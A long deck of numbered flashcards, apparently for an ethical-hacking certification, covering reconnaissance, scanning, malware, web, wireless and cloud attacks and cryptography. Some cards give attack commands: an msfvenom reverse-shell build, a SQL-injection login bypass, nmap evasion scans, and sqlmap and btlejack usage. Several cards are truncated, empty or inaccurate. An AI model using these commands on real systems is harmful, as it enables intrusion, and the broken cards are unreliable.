Fast Track Flashcards

1
Reconnaissance
Cyber Kill Chain stage that precedes the Weaponization stage.
2
Weaponization
Cyber Kill Chain stage in which the attacker selects or creates a client-side backdoor to send to the users' collected email addresses.
3
Delivery
Third stage of the Cyber Kill Chain, in which the attacker sends the weaponized bundle to the victim via email, USB, etc.
4
Actions on objectives
Cyber Kill Chain stage in which data exfiltration occurs.
5
Unspecified proxy activities
Multiple domains pointing to the same host, allowing the attacker to switch quickly between the domains and avoid detection.
6
White hat
Would notify the system owner and the software vendor if they found a zero-day vulnerability.
7
Gray Hats
Gray hats are individuals who work both offensively and defensively at various times.
8
Reconnaissance
Reconnaissance refers to the preparatory phase in which an attacker gathers as much information as possible about the target prior to launching the attack. In this phase, the attacker draws on competitive intelligence to learn more about the target. It could be the future point of return, noted for ease of entry for an attack when more about the target is known on a broad scale. The reconnaissance target range may include the target organization's clients, employees, operations, network, and systems.
9
Clearing Tracks
The attacker overwrites the server, system, and application logs to avoid suspicion.
10
Determine the impact of the change
The first consideration when implementing a change is to determine the impact of the change.
11
Operational Threat Intelligence
Operational threat intelligence provides information about specific threats against the organization. It provides contextual information about security events and incidents that helps defenders disclose potential risks, gain greater insight into attacker methodologies, identify past malicious activities, and investigate malicious activity more efficiently.
12
Technical Threat Intelligence
This intelligence is fed directly into security devices in digital format to identify and block malicious inbound and outbound traffic on the organization's network.
13
Incident triage
Phase in which the type of attack, its severity, target, impact, method of propagation, and vulnerabilities exploited are analyzed.
14
PCI-DSS
The Payment Card Industry Data Security Standard (PCI DSS) is a proprietary information security standard for organizations that handle cardholder information for major debit, credit, prepaid, e-purse, ATM, and POS cards.
15
HIPAA
Regulations that protect personal medical records (PHI).
16
PHI
Personal Health Information (personal medical records).
17
SOX
The Sarbanes-Oxley Act is designed to protect investors and the public by increasing the accuracy and reliability of corporate accounting disclosures.
18
[site:]
site: This operator restricts search results to the specified site or domain.
19
[related:]
related: This operator displays websites that are similar or related to the URL specified.
20
[filetype:]
filetype: This operator allows you to search for results based on a file extension.
21
Reverse Image Search
Reverse image search helps an attacker in tracking the original source and details of images, such as photographs, profile pictures, and memes.
22
Censys
Attackers use IoT search engines, such as Censys, to gather information about the target IoT devices, such as manufacturer details, geographical location, IP address, hostname, and open ports. Censys continually monitors every reachable server and device on the Internet, so one can search for and analyze them in real time.
23
Dark web footprinting
Uses specialized tools or search engines to encrypt browsing activity and navigate anonymously.
24
Hootsuite
An automated geolocation tool.
25
Website mirroring
Copying an entire website to a local drive to view the directory structure, file structure, external links, etc.
26
CeWL
An attacker uses the CeWL tool to gather a list of words from the target website and perform a brute-force attack on the email addresses gathered earlier.
27
Web-Stat
A tool to monitor websites, analyze the website's traffic, and track the geographical location of the users visiting the website.
28
Infoga
A tool that tracks the target's emails and extracts information such as sender identities, mail servers, sender IP addresses, and sender locations from different public sources.
29
Whois footprinting
Gathers domain information such as the target domain name, contact details of its owner, expiry date, and creation date
30
RIPE NCC
Regional Internet Registry for Europe
31
Bluto
An automated tool that can retrieve information about DNS zone data including DNS domain names, computer names, IP addresses, DNS records, and network Whois records.
32
ARIN
An online tool to retrieve information such as the network range of the target organization
33
Impersonation
Impersonation is a technique whereby an attacker pretends to be a legitimate or authorized person. Attackers perform impersonation attacks personally or use phones or other communication media to mislead targets and trick them into revealing information.
34
OSINT framework
OSINT Framework is an open source intelligence gathering framework that helps security professionals in performing automated footprinting and reconnaissance activities.
35
ACK flag probe scan
Discovers devices hidden by a restrictive firewall
36
-PP
Nmap / Zenmap ICMP timestamp ping scan: # nmap -PP
37
-PS
Nmap / Zenmap SYN ping scan: # nmap -PS
38
nmap -sn -PS <target IP address>
TCP SYN ping scan
39
TCP Maimon scan
Sends FIN/ACK probes; if the target host responds with an RST packet, the port is determined to be closed.
40
Stateful firewall
Does not respond with an RST to an ACK packet sent to a closed port.
41
-sA
Nmap ACK flag probe scanning: attackers send an ACK probe packet with a random sequence number; no response implies that the port is filtered (a stateful firewall is present), whereas an RST response means that the port is not filtered.
42
-sV
In Nmap, the -sV option is used to detect the service type and version.
43
Idle scanning
Uses a zombie system with low network activity and predictable IP identification numbers.
44
Banner grabbing
Using the -sV flag with Nmap
45
128
Windows OS TTL
46
-D
Nmap / Zenmap IP address decoy scan. The IP address decoy technique refers to generating or manually specifying IP addresses of the decoys to evade IDS/firewalls: # nmap -D RND:10 [target]
47
-T0
Nmap / Zenmap paranoid timing option. The paranoid timing option makes the least noise, which helps evade IDS: # nmap -T0 [target]
48
Linux OS
Uses a TTL of 64 and a window size of 5840.
49
Scanning networks
Assists in drawing network diagrams. Drawing a network diagram helps an attacker identify the topology or architecture of a target network.
50
SMB
Runs on TCP ports 139 and 445.
51
389
Unsecured LDAP port; it should be changed to 636 (LDAPS).
52
SNMP
Uses UDP port 161. If you find unencrypted SNMP traffic on your network, change to SNMPv3.
53
<03>
NetBIOS code for the messenger service
54
LNMIB2.MIB
Contains object types for workstation and server services.
55
Jxplorer
Tool to anonymously query the LDAP service for sensitive information such as usernames, addresses, and departmental details.
56
SMTP Enumeration
SMTP provides 3 built-in commands: VRFY validates users; EXPN shows the actual delivery addresses of aliases and mailing lists; RCPT TO defines the recipients of a message.
57
DNS Cache Snooping
DNS cache snooping is a type of DNS enumeration technique in which an attacker queries the DNS server for a specific cached DNS record. By using this cached record, the attacker can determine the sites recently visited by the user.
58
FTP Enumeration
The File Transfer Protocol (FTP) is used to transfer files over TCP, and its default port is 21.
59
NTLM
Can be used to secure an LDAP service against anonymous queries.
60
LDAP Enumeration Countermeasures
By default, LDAP traffic is transmitted unsecured (port 389); therefore, use Secure Sockets Layer (SSL) or STARTTLS technology to encrypt the traffic (port 636).
61
False positives
Vulnerabilities found in a tool-based vulnerability assessment that are not true vulnerabilities.
62
Medium
CVSS v3.0 severity rating range 4.0-6.9.
63
4.0-6.9
CVSS v3.1 medium severity rating range.
64
Remediation
Process of applying fixes to vulnerable systems to reduce the impact and severity of vulnerabilities.
65
Vulnerability-management life cycle
The phases involved in vulnerability management are: 1. Identify assets and create a baseline; 2. Vulnerability scan; 3. Risk assessment; 4. Remediation; 5. Verification; 6. Monitor.
66
Passive Assessment
Passive assessments sniff the traffic present on the network to identify the active systems, network services, applications, and vulnerabilities. Passive assessments also provide a list of the users who are currently accessing the network.
67
External Assessment
External assessment examines the network from a hacker’s point of view to identify exploits and vulnerabilities accessible to the outside world. These types of assessments use external devices such as firewalls, routers, and servers.
68
Host-based Assessment
Host-based scanners assess systems to identify vulnerabilities such as native configuration tables, incorrect registry or file permissions, and software configuration errors.
69
Network-based scanner
Scans other machines on the network to identify vulnerabilities.
70
Wireless Network Assessment
Wireless network assessment determines the vulnerabilities in an organization’s wireless networks. Many networks still use weak and outdated security mechanisms and are open to attack.
71
Host-based assessment
Can identify vulnerabilities in user directories, registries, native configuration tables, incorrect registry or file permissions, and software configuration errors.
72
Inference-based assessment
After finding services, it selects vulnerabilities on each machine and starts to execute only those relevant tests.
73
Steps followed by Vulnerability Scanners
1. Locating nodes; 2. Performing service and OS discovery on them; 3. Testing those services and OS for known vulnerabilities.
74
Gaining access
May involve infecting a system with malware and using phishing to gain credentials to a system or web application.
75
Dictionary Attack
In this type of attack, a dictionary file is loaded into a cracking application that runs against user accounts. This dictionary is a text file that contains several dictionary words commonly used as passwords. The program uses every word present in the dictionary to find the password.
76
Internal monologue attack
Steps to perform an internal monologue attack: 1. The attacker disables the security controls of NetNTLMv1 by modifying the values of LMCompatibilityLevel, NTLMMinClientSec, and RestrictSendingNTLMTraffic. 2. The attacker extracts all the non-network logon tokens from all the active processes to masquerade as legitimate users.
77
Some password-cracking tools are listed as follows:
John the Ripper, hashcat, THC-Hydra, Medusa
78
Password salting
Extra data is added to a password before hashing to defeat rainbow tables.
79
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.13 LPORT=4444 -f exe > shell.exe
Generates reverse TCP (Meterpreter) shellcode for Windows, packaged as an executable.
80
Buffer overflow
char buff[12];
81
MITRE.org CVE
MITRE maintains a CVE database that contains details of the latest vulnerabilities. Attackers can search MITRE CVE to discover vulnerabilities that exist in the target system.
82
Getsystem
Use Metasploit commands such as getsystem to gain administrative-level privileges and extract password hashes of the admin/user accounts.
83
Kernel-Level Rootkit
The kernel is the core of an OS. A kernel-level rootkit runs in Ring 0 with the highest OS privileges. These rootkits conceal backdoors on the computer and are created by writing additional code, or by substituting portions of kernel code with modified code, via device drivers in Windows or loadable kernel modules in Linux.
84
.bash_history
Maintains a log of typed input.
85
DNS tunneling
Embedding malicious data into DNS protocol packets that even DNSSEC cannot detect.
86
UNIX / Linux
Files in UNIX / Linux can be hidden just by prepending a dot (.) to the file name.
87
Adware
Causes annoying pop-ups with advertisements.
88
Advanced persistent threat
Remains undetected for a long time and obtains sensitive information without sabotaging the organization.
89
Initial intrusion
The Initial Intrusion phase of the APT lifecycle includes: 1. Deployment of malware; 2. Establishment of an outbound connection.
90
Initial intrusion
Attacker attempts to enter the target network using techniques such as sending spear-phishing emails and exploiting vulnerabilities on publicly available servers.
91
DDoS Trojans
The Mirai IoT botnet Trojan is still considered one of the most notorious DDoS attack Trojans.
92
Stealth virus
A stealth virus hides from antivirus software by hiding the original size of the file or temporarily placing a copy of itself in some other system drive, thus replacing the infected file with the uninfected file that is stored on the hard drive.
93
Encryption virus
Can cipher itself and change its own code.
94
Computer Worms
Computer worms are standalone malicious programs that replicate, execute, and spread across network connections independently without human intervention.
95
File-less malware
Malware that AV tools are unable to find.
96
Launching Fileless Malware through Phishing
Attackers commonly use social engineering techniques such as phishing to spread fileless malware to the target systems. They send spam emails embedded with malicious links to the victim. When the victim clicks on the link, he/she will be directed to a fraudulent website that automatically loads Flash and triggers the exploit.
97
VirusTotal
A free service that analyzes suspicious files.
98
Credential Enumerator
It is a self-extracting RAR file containing two components. One is the bypass component, and the other is the service component. The bypass component is used for the enumeration of network resources and it either finds writable share drives using the Server Message Block (SMB) or tries to brute-force user accounts, including the administrator account.
99
BetterCAP
A tool to send fake ARP messages over the target network to link a MAC address with the target system's IP address.
100
MAC flooding
MAC flooding involves flooding the CAM table with fake MAC address and IP pairs until it is full.
101
DHCP starvation
Attack that leases all the DHCP addresses available in the DHCP scope.
102
STP attack
Attacker plugs in a rogue switch with a lower priority than any other switch to make it the root bridge.
103
The attacker makes a request to the DNS resolver
First step in conducting DNS cache poisoning.
104
Phishing
The attacker pretends to be technical support staff of the targeted organization's software vendors or contractors.
105
Honey trap
Attackers target a person inside the company online, pretending to be an attractive person. They then begin a fake online relationship to obtain confidential information about the target company.
106
Impersonation
The attacker may impersonate a technician and gather sensitive information by scanning terminals for passwords, searching for important documents on employees' desks, or rummaging through bins.
107
Scareware
Scareware is often seen in pop-ups that tell the target user that their machine has been infected with malware. Further, these pop-up ads always have a sense of urgency and tell the victim to quickly download the software if they want to get rid of the supposed virus.
108
Phishing
Redirects to malicious websites by sending a malicious link which appears to be real by email.
109
Pharming
The attacker redirects web traffic to a fraudulent website by installing a malicious program on a personal computer or server. Can be performed in two ways: DNS cache poisoning and hosts file modification.
110
Evilginx
Phishing tool
111
Whaling
A whaling attack is a type of phishing that targets high-profile executives such as CEOs, CFOs, politicians, and celebrities who have complete access to confidential and highly valuable information.
112
Spoofed Session Flood Attack
In this type of attack, attackers create fake or spoofed TCP sessions by carrying multiple SYN, ACK, and RST or FIN packets to perform DDoS attacks against target networks, exhausting their network resources.
113
Slowloris attack
A DDoS attack. Partial HTTP requests are sent to open multiple connections and slow down the application.
114
Hit-list scanning technique
Collects information about a large number of vulnerable machines to create a list, then infects those machines to create a botnet.
115
DoS/DDoS Countermeasure
Implement cognitive radios in the physical layer to handle jamming and scrambling attacks.
116
Grabs the user’s session cookie and session ID
document.write(');
117
Session donation attack
Attacker obtains a valid session ID and feeds the same session ID to the victim. The session ID links the victim to the attacker's account page. The victim's sensitive payment details entered in a form are then linked to the attacker's account.
118
TCP/IP hijacking
Monitoring established traffic between the victim and host to predict the ISN, using the ISN to spoof packets sent to the host, hanging the victim's connection, and impersonating the victim to communicate with the host.
119
Burp Suite
Burp Suite contains the following key components: an intercepting proxy, which allows the user to inspect and modify traffic between their browser and the target application; an intruder tool for performing powerful customized attacks to find and exploit unusual vulnerabilities; and a sequencer tool for testing the randomness of session tokens.
120
FTPS
Sends data using encryption and digital certificates.
121
VPN
A VPN creates a safe and encrypted tunnel over a public network to securely send and receive sensitive information.
122
False positive
IDS raises an alarm when no attack has taken place.
123
DMZ
A DMZ should always be used when the company has publicly available servers.
124
Web Server
The web server should be internet-facing, but application and database servers should not.
125
Honeypot
An appealing isolated environment for hackers.
126
Obfuscating
Encoding packets with Unicode characters. The IDS cannot recognize the packets, but the web server can decode them.
127
Some online anonymizers include:
https://proxify.com, http://www.guardster.com, http://anonymouse.org
128
NSTX
Runs on port 53
129
Detecting the presence of Honeyd Honeypot
An attacker can identify the presence of a Honeyd honeypot by performing time-based TCP fingerprinting methods (SYN proxy behavior).
130
AndroidManifest.xml
The file that determines the basic configuration (specifically activities, services, broadcast receivers, etc.) of an Android application.
131
DNS hijacking
When the user enters a legitimate URL in a browser, the settings redirect to the attacker's fake site. The user may be prompted to re-enter credentials as if they have never visited the site before, and the site may not be secure.
132
Directory traversal
Dot-dot-slash (../) character string in a URL to navigate to a parent directory on a web server.
133
php.ini
Can be misconfigured to provide verbose error messages.
134
Server-side request forgery (SSRF) attack
A designer can utilize a URL such as https://xyz.com/feed.php?url=externalsite.com/feed/to to obtain a remote feed.
135
Robots.txt
A file used to discover the structure of a website.
136
Web Server Footprinting
By performing web server footprinting, an attacker can gather valuable system-level data such as account details, operating systems, software versions, server names, and database schema details.
137
Patch management
Failure would be not applying fixes in a timely fashion. Example: a company is breached several months after a fix is available from the vendor.
138
Limiting the administrator or root-level access to the minimum number of users
Helps secure the user accounts on the web server.
139
Syhunt Hybrid
Syhunt Hybrid crawls websites and detects XSS, directory traversal problems, fault injection, SQL injection, attempts to execute commands, and several other attacks.
140
Web application security scanners:
Netsparker, Burp Suite
141
WS-Security
Web Services Security (WS-Security) plays an important role in securing web services. It is an extension of SOAP and aims to maintain the integrity and confidentiality of SOAP messages as well as to authenticate users.
142
Server-Side Includes Injection
Server-side Includes is an application feature that helps designers auto-generate the content of a web page without manual involvement. Such an application accepts remote user inputs and uses them on the page.
143
XXE
XML External Entity malicious request example:
144
Watering Hole Attack
It is a type of unvalidated redirect attack whereby the attacker first identifies the website most visited by the target, determines the vulnerabilities in that website, injects malicious code into the vulnerable web application, and then waits for the victim to browse the website. Once the victim tries to access the website, the malicious code executes, infecting the victim.
145
ClickJacking Attack
Attacker creates a transparent 'iframe' in front of the URL the victim attempts to click; the victim actually clicks on the content or URL inside the transparent 'iframe' set up by the attacker.
146
Side-channel attack
Attackers perform character-by-character password examination and exploit the timing information to determine the position at which the password comparison failed. Attackers then use this data to determine the target user's password.
147
Banner Grabbing
Banner grabbing using wget: wget -S [target]
148
Wordlist
The Gobuster tool's fastest option.
149
Verbose Failure Messages
When the application specifies which field is incorrect or pops up reasons for denying access, attackers can easily exploit that field by trying a large set of similar names or words to enumerate valid data required to access the application. The list of enumerated data can also be used later for social engineering.
150
WS-Address Spoofing
WS-Address provides additional routing information in the SOAP header to support asynchronous communication.
151
RESTful API
A web service that uses HTTP methods such as PUT, POST, GET, and DELETE and can improve the overall performance, visibility, scalability, reliability, and portability of an application.
152
Webhooks
User-defined HTTP callbacks or push APIs that are raised based on trigger events.
153
No ABAC Validation
Lack of proper attribute-based access control (ABAC) validation allows attackers to gain unauthorized access to API objects or perform actions such as viewing, updating, or deleting them.
154
.stm
Server-side Include Injection: avoid using pages with file name extensions such as .stm, .shtm, and .shtml to prevent attacks.
155
Bug bounty program
Vulnerability disclosure program opened by companies.
156
select * from Users where UserName = 'attack' or 1=1 --' and UserPassword = '123456'
SQL command executed by the server when you enter the following into a login form: Username: attack' or 1=1-- Password: 123456
157
Union SQL Injection
In a UNION SQL injection, an attacker combines a forged query with a query requested by the user using a UNION clause. The result of the forged query is appended to the result of the original query, which makes it possible to obtain the values of fields from other tables.
158
Union SQL Injection
Uses the UNION operator to combine the result sets of two or more SELECT statements if they have the same structure.
159
Blind SQL Injection
Attacker can steal data by asking a series of true or false questions through SQL statements.
160
Time-based
SQL injection attack that tests the response time of a true or false response.
161
Boolean-based
SQL injection attack that determines whether the database returns true or false results for user IDs.
162
Out-of-band SQLi
May use DNS requests to retrieve information for the attacker.
163
Variation
Placing characters such as "' or '1'='1'" in any basic injection statement such as "or 1=1".
164
Whitelist Validation
Whitelist validation is a best practice whereby only the list of entities (i.e., data type, range, size, value, etc.) that have been approved for secured access is accepted.
165
WEP
Was designed to mimic wired encryption.
166
WPA 3 - Personal
It is mainly used to deliver password-based authentication using the SAE protocol, also known as Dragonfly Key Exchange, which replaces the PSK concept used in WPA2-Personal. It is resistant to offline dictionary attacks and key recovery attacks.
167
WPA3-Enterprise
Allows 192-bit minimum-strength security protocols such as GCMP-256, HMAC-SHA384, and ECDSA using a 384-bit elliptic curve.
168
KRACK
Adversary tricks a victim into reinstalling an already-in-use key. Associated parameters such as the incremental transmit packet number and receive packet number are reset to their initial values.
169
Finding WPS-Enabled APs
Attackers use the Wash command-line utility to identify WPS-enabled APs in the target wireless network.
170
Evil-Twin attack
An evil twin is a wireless AP that pretends to be a legitimate AP by imitating its SSID. It often won't require authentication where the legitimate AP does.
171
aLTEr attack
Wireless attack in which the attacker launches a MITM attack using a fake communication tower, intercepting the user's data and redirecting them to a malicious site.
172
Dragonblood
WPA3 encryption
173
Downgrade Security Attacks
To launch this attack, the client and AP should support both WPA3 and WPA2 encryption mechanisms. Here, the attacker forces the user to follow the older encryption method, WPA2, to connect to the network.
174
Bluesnarfing
Theft of information from a wireless device through Bluetooth.
175
btlejack -f 0x9c68fd30 -t -m 0x1fffffffff
Btlejacking using BtleJack. Start hijacking the connection using the following command: btlejack -f 0x9c68fd30 -t -m 0x1fffffffff
176
Disable SSID broadcasting
To make a wireless network undiscoverable.
177
Wardriving
Attackers drive around with Wi-Fi-enabled laptops installed with a wireless discovery tool to map out open wireless networks.
178
Agent Smith attack
Legitimate smartphone apps are replaced by deceptive applications that appear legitimate.
179
Spearphone Attack
A spearphone attack allows Android apps to record loudspeaker data without any privileges.
180
Advanced SMS Phishing
The attack vector mainly depends on a process called Over-the-Air (OTA) provisioning, which is mainly used by network operators. The attacker exploits the mobile device by sending messages that seem to be genuine from the network operator.
181
Untethered jailbreaking
Patches the kernel so the device remains jailbroken after each successive reboot.
182
iOS trustjacking
Vulnerability that can be exploited by an attacker to read messages and emails by abusing the "iTunes Wi-Fi Sync" feature.
183
Trident
Trident is capable of taking complete control of the target mobile device, and it allows attackers to monitor and track all the user activities. It also allows attackers to record audio, capture screenshots, and monitor all phone calls and SMS messages.
184
Reverse engineering
Reverse engineering is used to disassemble a software program or a mobile application to analyze its design flaws and fix any bugs residing in it.
185
Zigbee
based on the IEEE 203.15.4 standard (This is a typo in the book and on the exam — the actual standard is 802.15.4)
186
Power/Clock/Reset Glitching
These types of attacks occur when faults or glitches are injected into the power supply; they can be used for remote execution and also cause the skipping of key instructions. Faults can also be injected into the clock network used for delivering a synchronized signal across the chip.
187
Replay attack
1. Attacker targets the specified frequency. 2. After obtaining the frequency, the attacker can capture the original data when the commands are initiated by the connected devices. 3. Once the original data is collected, the attacker uses free tools such as URH (Universal Radio Hacker) to segregate the command sequence. 4. The attacker then injects the segregated command sequence on the same frequency.
188
FCC ID search
Helps in finding the details of devices and the certification granted to them.
189
IoTSeeker
IoTSeeker scans a network for specific types of IoT devices to detect whether they are using the default, factory-set credentials.
190
48101
Port commonly used by compromised IoT devices to spread malware.
191
HMI-based Attacks
Attackers often try to compromise an HMI system as it is the core hub that controls critical infrastructure. If attackers gain access to HMI systems, they can cause physical damage to the SCADA devices (industrial automation components) or collect sensitive information related to the critical architecture that can be used later to perform malicious activities.
192
nmap -Pn -sU -p 44818 --script enip-info <Target IP>
Using the above command, attackers can gather information such as the vendor name, product code and name, device name, IP address, etc.
193
Flowmon
Empowers manufacturers and utility companies to confidently ensure the reliability of their industrial networks and avoid downtime and disruption of service continuity.
194
SaaS
The subscriber is responsible only for the management of users. The provider is responsible for the hardware, operating system, and software administration, including patching and monitoring.
195
Infrastructure as a Service
Infrastructure as a Service requires the subscriber to take the most responsibility for maintaining resources.
196
Community
A group of users or organizations share a cloud environment.
197
Cloud carrier
Provides internet connectivity and transport services between the organization and the cloud service provider.
198
Cloud Carrier
A cloud carrier acts as an intermediary that provides connectivity and transport services between CSPs and cloud consumers.
199
Tier-2: Testing and accreditation systems
Validates image contents, signs images, and sends them to the registries.
200
Docker
Docker provides a PaaS through OS-level virtualization and delivers containerized software packages. This technology isolates applications from the underlying infrastructure for faster software delivery.
201
Docker daemon
A component that can process API requests and handle various Docker objects, such as containers, volumes, images, and networks.
202
Kube-scheduler
Kube-scheduler is a master component that scans newly generated pods and allocates a node for them. It assigns the nodes based on factors such as the overall resource requirement, data locality, software/hardware/policy restrictions, and internal workload interventions.
203
Lock-in
The difficulty a user experiences when migrating from in-house systems, or from one cloud service provider to another, due to the lack of tools, procedures, or standard data formats. It poses potential threats to data, application, and service portability.
204
Unsynchronized System Clocks
Failing to synchronize clocks on end systems can affect the working of automated tasks. For example, if the cloud computing devices do not have synchronized or matching times, the resulting timestamp inaccuracy leaves the network administrator unable to analyze the log files accurately for any malicious activity.
205
Cloud hopper attack
Attackers initiate spear-phishing emails with custom-made malware to compromise the accounts of staff or cloud service firms to obtain confidential information
206
Cloudborne Attack
Cloudborne is a vulnerability residing in a bare-metal cloud server that enables attackers to implant a malicious backdoor in its firmware.
207
Social engineering
May involve phone calls posing as a legitimate employee or sending phishing emails
208
Zero Trust Networks
The Zero Trust model is a security implementation that by default assumes every user trying to access the network is not a trusted entity and verifies every incoming connection before allowing access to the network.
209
Triple Data Encryption Standard
64-bit blocks, 3 keys, 56-bit keys
210
Serpent
Serpent involves 32 rounds of computational operations that include substitution and permutation operations on four 32-bit word blocks using 8-variable S-boxes with 4-bit entry and 4-bit exit. It uses a 128-bit symmetric block cipher with key sizes of 128, 192, or 256 bits.
211
CAST-128
CAST-128 is a symmetric-key block cipher having: a classical 12- or 16-round Feistel network with a block size of 64 bits; 8x32-bit S-boxes (S1, S2, S3, S4) based on bent functions, modular addition and subtraction, key-dependent rotation, and XOR operations; and a masking key (Km1) and a rotation key (Kr1) for performing its functions.
212
TPM
Hardware on a computer's motherboard that generates encryption keys
213
Twofish
Encryption algorithm uses 128-bit block size, and key size up to 256 bits
214
Private Key
Sender’s private key signs a message by encrypting the hash (or checksum)
215
Public Key
Sender’s public key verifies (confirms) a message signature
216
Recipient’s public key
Recipient’s public key is used to encrypt a message
217
GNU Privacy Guard (GPG)
GNU Privacy Guard (GPG) is a software replacement of PGP and free implementation of the OpenPGP standard that is used to encrypt and decrypt data.
218
Web of trust (WOT)
In WOT, every PGP user in the network has a ring of public keys to encrypt the data, and they introduce many other users whom they trust. In this trust model, a user encodes the data with the receiver’s public key that is decrypted only by the receiver’s private key.
219
Key archival
BitLocker keys can be stored in, and recovered from, Active Directory
220
Key stretching
In the key stretching technique, the initial key is given as input to an algorithm that generates an enhanced key. The key must be sufficiently resistant to brute-force attacks.
221
Hash Injection/Pass-the-Hash (PtH) Attack
A hash injection/PtH attack allows an attacker to inject a compromised hash into a local session and use the hash to validate network resources.
222
Duplicate MAC addresses
Duplicate MAC addresses in your ARP table can indicate an ARP spoofing attack
223
sqlmap.py -u [TargetURL] --dbs
In this command, -u specifies the target URL and --dbs enumerates the DBMS databases.
224
DROWN attack
The same private key/certificate is used on a different server that allows SSLv2 connections, which can leak key information.
225
provide answers to security questions
Problem with social media posts that ask personal questions under the guise of getting to know you better
226
Bettercap
Bettercap is the most suitable tool for conducting a session hijacking attack on a wireless network with WPA-PSK security, due to its advanced capabilities in network analysis and versatility in handling various security protocols.
227
Brute Force
A Brute Force attack directly leverages the absence of an account lockout policy and the presence of detailed error messages that provide feedback on login attempts.
228
Raw Sniffing
Raw Sniffing allows for the passive capture of all network traffic, providing a comprehensive view of data flow without actively manipulating network behavior.
229
‘blind’ SQL Injection attack
A ‘blind’ SQL Injection attack allows for data extraction through true or false responses from the application, effectively circumventing input validation measures that block suspicious patterns.
230
Error-based SQL Injection
Error-based SQL Injection takes advantage of the detailed error messages provided by the application to understand the database structure and formulate effective injection queries.
231
digital signature mechanism
Applying a digital signature mechanism ensures the integrity and authenticity of data upon retrieval, verifying that it hasn't been altered or tampered with since being signed.
232
SSL/TLS encryption
Implementing SSL/TLS encryption for data transmission ensures secure and encrypted communication, effectively preventing Man-in-the-Middle attacks from intercepting or manipulating the data.
233
Data encryption with AES-256
Data encryption with AES-256 offers a high level of security and performs better than older algorithms like 3DES, while also efficiently balancing security and performance needs in the face of potential quantum computing threats.
234
Implementing WPA2 or WPA3 encryption
Implementing WPA2 or WPA3 encryption is a suitable security measure, as it provides strong protection for the Wi-Fi network and is straightforward to set up and manage, making it ideal for an environment with limited technical knowledge.
235
Applying asymmetric encryption with RSA
Applying asymmetric encryption with RSA and using the private key for signing ensures confidentiality through encryption and non-repudiation by using the private key for digital signing.
236
Enabling encryption
Enabling encryption on the wireless network is the most effective first step to mitigate the risk of Wi-Fi eavesdropping, as it secures all data transmitted over the network, making it difficult for unauthorized individuals to intercept and understand the communications.
237
WPA3 encryption
Implementing WPA3 encryption for the store's Wi-Fi network is the most suitable measure to mitigate the risk of Wardriving attacks, as it provides strong security without affecting the customer experience of accessing in-store Wi-Fi.
238
Passive reconnaissance
Passive reconnaissance techniques such as WHOIS lookups, NS lookups, and web research, allow for the collection of valuable information without sending traffic to the target network, thus avoiding detection by intrusion detection systems.
239
Cloud Access Security Broker (CASB)
Using a Cloud Access Security Broker (CASB) is the best solution for achieving unified security management across multiple cloud platforms, as it enables consistent enforcement of security policies, threat monitoring, and visibility into cloud resources.
240
q=17, T=220
q=17, T=220: In this scenario, the total delay caused by the attacker ('q*d' = 221 seconds) exceeds the threshold of 200, indicating a high likelihood of triggering a security alert
241
MAC flooding
MAC flooding can overwhelm the switch's memory, a technique that can cause the switch to behave like a hub, thus enabling the attacker to capture packets intended for other hosts in the network.
242
Sublist3r
Employing a tool like Sublist3r, which is designed to enumerate the subdomains of websites using OSINT (Open Source Intelligence), as it specifically targets the discovery of subdomains, making it highly efficient for this particular task.
243
Captive portal page
Displaying a captive portal page that warns users about the possibility of Evil Twin attacks is the most effective and user-friendly measure, as it educates users about the risk without requiring them to install additional software or change their connection habits.
244
employee awareness training
Organize regular employee awareness training regarding social engineering techniques and preventive measures, as this is crucial in educating the workforce about the nature of social engineering attacks, which often exploit human psychology rather than technological vulnerabilities.
245
network segmentation
Using network segmentation to isolate IoMT devices from the main network is the main recommendation, as it limits the potential impact of a breach and reduces the risk of IoMT devices being used as entry points for network-wide attacks.
246
Vulnerability scanning
Vulnerability scanning software is limited in its ability to detect vulnerabilities at a given point in time, meaning it might not identify new vulnerabilities that emerge after the scan, which is particularly relevant given the dynamic nature of the network environment described, including legacy applications and outdated systems.
247
Cross-Site Scripting (XSS) attack
A Cross-Site Scripting (XSS) attack can bypass JavaScript client-side sanitization and exploit the exposure of session cookies not set with the HttpOnly flag
248
The total number of high, medium, and low-risk vulnerabilities
The total number of high, medium, and low-risk vulnerabilities detected throughout the network would NOT be typically included in the detailed documentation for a specific vulnerability, as this information is more relevant to an overall network vulnerability assessment rather than the documentation of a particular vulnerability.
249
A vulnerability with a base metric score of 7...
A vulnerability with a base metric score of 7, a temporal metric score of 8, and an environmental metric score of 5, has an overall high severity, the likelihood of exploitability is increasing over time, and it has a medium impact in their specific environment
250
Hybrid Attack
In a system hacking scenario where passwords are common words with added numbers, a Hybrid Attack, which combines dictionary and brute-force methods, is most likely to succeed.
251
DLL Hijacking
In a scenario where a malicious Dynamic Link Library (DLL) is loaded in the application directory without a fully qualified path, the likely privilege escalation technique used is DLL Hijacking.
252
Man-in-the-middle Attack Using Forged ICMP and ARP Spoofing
In network-level session hijacking, inserting a machine between a client and server to reroute packets is indicative of a Man-in-the-middle Attack Using Forged ICMP and ARP Spoofing.
253
dedicated network
Using a dedicated network for a smart home system, separate from the home's main Wi-Fi network, effectively isolates devices, enhancing security by ensuring that if one device is compromised, the rest remain secure.
254
char encoding function
Using the char encoding function to convert hexadecimal and decimal values into characters that pass through SQL engine parsing is an effective SQL Injection evasion technique for bypassing signature-based IDS by altering the query format without changing its logic.
255
NTLM password hash
Changing the NTLM password hash used to encrypt a service ticket (ST) will invalidate a stolen Ticket Granting Service ticket and prevent the attacker from using it even if they successfully crack it.
256
DNS tunneling
Initiating DNS tunneling to communicate with the command-and-control server allows the adversary to hide malicious traffic within legitimate DNS traffic, making it harder to detect and block.
257
service ticket
Requesting a service ticket for the service principal name of the target service account is the next step in a Kerberoasting attack after obtaining a valid user authentication ticket (TGT), allowing the analyst to target specific service accounts for password compromise.
258
Internet Service Provider (ISP)
Contact your Internet Service Provider (ISP) for assistance, as they can provide immediate support and implement measures like traffic filtering to mitigate a Distributed Denial of Service (DDoS) attack.
259
f=490
f=490: The server can handle 490 SYN packets per second. With 's' exceeding 'f' by 10, the response time shoots up (2^10 = 1024 times the usual response time), indicating a system overload.
260
use_ssl = True
The 'use_ssl = True' setting in the server object creation is necessary for establishing a secure connection with an LDAP server that only accepts secure connections.
261
sophisticated XSS payload
Creating a sophisticated XSS payload that leverages HTML encoding to bypass the input sanitization can be used to redirect users to a malicious site where their cookies can be captured, which circumvents the HTTPOnly flag by redirecting users rather than directly accessing the cookies.
262
Default settings
Default settings reveal server software type; change these settings, as attackers can exploit known vulnerabilities of specific software types more easily when the default settings that reveal this information are used.
263
